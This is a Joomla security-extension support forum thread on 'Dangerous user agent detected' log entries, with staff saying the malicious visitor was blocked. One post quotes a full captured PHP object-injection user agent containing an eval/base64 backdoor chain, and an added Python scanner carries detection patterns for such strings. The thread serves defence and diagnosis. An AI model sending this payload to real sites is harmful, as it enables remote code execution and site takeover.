
Read this first!

We do not monitor these forums. The forum is provided to exchange information and experience with other users ONLY. Forum responses are not guaranteed.

However, please submit a ticket if you have an active subscription and wish to receive support. Our ticketing system is the only way of getting in touch with RSJoomla! and receiving the official RSJoomla! Customer Support.

For more information, the Support Policy is located here.

Thank you!

TOPIC: Definition of Dangerous user agent detected

Definition of Dangerous user agent detected 9 years 4 months ago #33471

  • lrenshaw
  • Fresh Boarder
  • Posts: 13
What does it mean when I see "Dangerous user agent detected" in my system log? Does that mean a hack attempt? I don't see any kind of definitions on your site for this stuff?
The administrator has disabled public write access.

Definition of Dangerous user agent detected 9 years 4 months ago #33472

  • info008
  • Fresh Boarder
  • Posts: 2
This seems to be new functionality with an accompanying message I haven't seen before updating to 2.9.2 just now.

I'm curious as well and hoping for more information about what the villains are trying to achieve. :-)

Willy

Definition of Dangerous user agent detected 9 years 4 months ago #33474

  • alexp
  • RSJoomla! Official Staff
  • Posts: 2253
  • Thank you received: 180
The latest Joomla! hacks that were revealed recently were performed via User Agent information. The latest RSFirewall! version incorporates an active scanner feature that detects user agents with potentially malicious data.

More on this topic on our blog.
Please note: my help is not official customer support. To receive your support, submit a ticket by clicking here
Regards,
RSJoomla! Development Team

Definition of Dangerous user agent detected 9 years 3 months ago #33494

  • jengel
  • Fresh Boarder
  • Posts: 2
Since 2.92 I see that more dangerous user agents are detected; this was not in earlier versions.
So I am also curious what is so dangerous in what is detected:
Debug informatie
User agent: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:102:"eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST))))));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}
Last Edit: 9 years 3 months ago by jengel.

Definition of Dangerous user agent detected 9 years 3 months ago #33502

  • alexp
  • RSJoomla! Official Staff
  • Posts: 2253
  • Thank you received: 180
It looks like some hacks were attempted on your Joomla! installation. The user agent information incorporates malware signatures. The latest Joomla! hacks are being performed via User Agent information.
Please note: my help is not official customer support. To receive your support, submit a ticket by clicking here
Regards,
RSJoomla! Development Team
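
A sketch of the kind of check described in this reply, added here as an example and not RSFirewall!'s own code: it scans access-log lines for User-Agent values that carry PHP serialized-object notation like the string quoted above. The signature names, the regular expressions and the sample log lines (documentation-range IPs, trimmed inert fragments) are assumptions constructed for illustration.

```python
import re
from collections import Counter

# Combined Log Format; the User-Agent is the last quoted field and any
# quote inside it arrives escaped, so allow backslash escapes in fields.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] ' + QUOTED + r' \d{3} \S+ ' + QUOTED + ' ' + QUOTED + r'$'
)

# Assumed signatures, modelled on the shape of the user agent in the thread.
SIGNATURES = {
    "php-serialized-object": re.compile(r'O:\d+:"[A-Za-z_\\][\w\\]*":\d+:\{'),
    "session-key-delimiter": re.compile(r'\}\w+\|[Oa]:\d+:'),
    "php-function-call": re.compile(r'\b(?:eval|assert|base64_decode)\s*\('),
}

def unescape(field):
    # nginx logs an embedded quote as \x22, Apache as \" ; undo both so the
    # signatures see the header value as the application received it.
    field = re.sub(r'\\x([0-9A-Fa-f]{2})', lambda m: chr(int(m.group(1), 16)), field)
    return field.replace('\\"', '"').replace('\\\\', '\\')

def scan_line(line):
    """Return (ip, [signature names hit]), or None for an unparsable line."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ua = unescape(m.group(4))
    return m.group(1), [name for name, rx in SIGNATURES.items() if rx.search(ua)]

def flagged_by_ip(lines):
    """Count flagged requests per source IP so repeat senders stand out."""
    counts = Counter()
    for line in lines:
        result = scan_line(line)
        if result and result[1]:
            counts[result[0]] += 1
    return dict(counts)

# Constructed sample lines: documentation IPs, trimmed inert fragments.
SAMPLE = [
    r'192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/121.0"',
    r'203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET / HTTP/1.1" 403 199 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:8:\"feed_url\";s:19:\"eval(base64_decode(\";}"',
    r'203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php HTTP/1.1" 403 199 "-" "}__test|O:21:\x22JDatabaseDriverMysqli\x22:0:{}"',
]

if __name__ == "__main__":
    for entry in SAMPLE:
        print(scan_line(entry))
    print(flagged_by_ip(SAMPLE))
```

A hit only shows that such a request arrived; whether it was stopped has to be read from the response status and the firewall's own log.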

Definition of Dangerous user agent detected 9 years 3 months ago #33508

I have seen this warning but am unclear whether this means there is already malware on my webserver or it's just a remote attack that has been blocked. I did suffer an attack where a couple of core files got changed recently (probably that latest hack that's now been fixed) and am concerned there may be malware lurking somewhere on the server which I don't know about.

Could we have a bit more clarity on what this error message actually means - a hack attempt has been blocked or malware is already present on the server?

Definition of Dangerous user agent detected 9 years 3 months ago #33510

  • alexp
  • RSJoomla! Official Staff
  • Posts: 2253
  • Thank you received: 180
This means that a site visitor (most likely a bot) that incorporated malicious code in its User Agent information has been blocked. It does not imply that your site has already been hacked. It would be best to run a System Check just to stay on the safe side.
Please note: my help is not official customer support. To receive your support, submit a ticket by clicking here
Regards,
RSJoomla! Development Team

Definition of Dangerous user agent detected 9 years 3 months ago #33600

  • info5127
  • Fresh Boarder
  • Posts: 1
I have a related question: why does the back-end of my RSFirewall config show "block" instead of "unblock" for an attack that has occurred for the "Dangerous user agent detected" event?


Definition of Dangerous user agent detected 9 years 3 months ago #33602

  • alexp
  • RSJoomla! Official Staff
  • Posts: 2253
  • Thank you received: 180
The visitor that contained the malicious user agent never actually got to open your website. The "blocking" action is designed to restrict access for the visitor's IP address.
Please note: my help is not official customer support. To receive your support, submit a ticket by clicking here
Regards,
RSJoomla! Development Team

Definition of Dangerous user agent detected 9 years 3 months ago #33606

  • info008
  • Fresh Boarder
  • Posts: 2
An additional comment to Alexp's reply is that you could activate Automatic Blacklisting. Here you can also set the # of attempts that lead to automatic blacklisting. I have set it to 2, as the second attempt ascertains that we have a repeat offender.

See Firewall Configuration, Active Scanner.

Willy